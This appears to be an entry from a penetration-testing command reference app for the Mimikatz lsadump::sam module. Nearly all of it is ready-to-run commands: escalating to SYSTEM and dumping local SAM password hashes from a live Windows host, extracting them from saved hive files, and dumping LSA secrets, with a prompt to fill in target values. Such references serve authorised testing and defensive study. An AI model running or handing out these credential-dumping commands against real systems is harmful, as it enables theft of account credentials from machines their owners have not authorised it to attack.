Mimikatz lsadump::sam

Extract local SAM hashes (built-in Administrator, local users) from a live Windows host. Run as SYSTEM (token::elevate) for direct registry access.

Tool
mimikatz.exe
Category
Credential Attacks / Hash Dumping
Platform
windows
Requires
local admin

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

Credential variants

The same attack using a different authentication material.

From Hive Files requires shell access

mimikatz.exe "lsadump::sam /sam:SAM.hive /system:SYSTEM.hive" exit

LSA Secrets requires local admin

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" exit

Examples

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

Tags

mimikatz sam local-hashes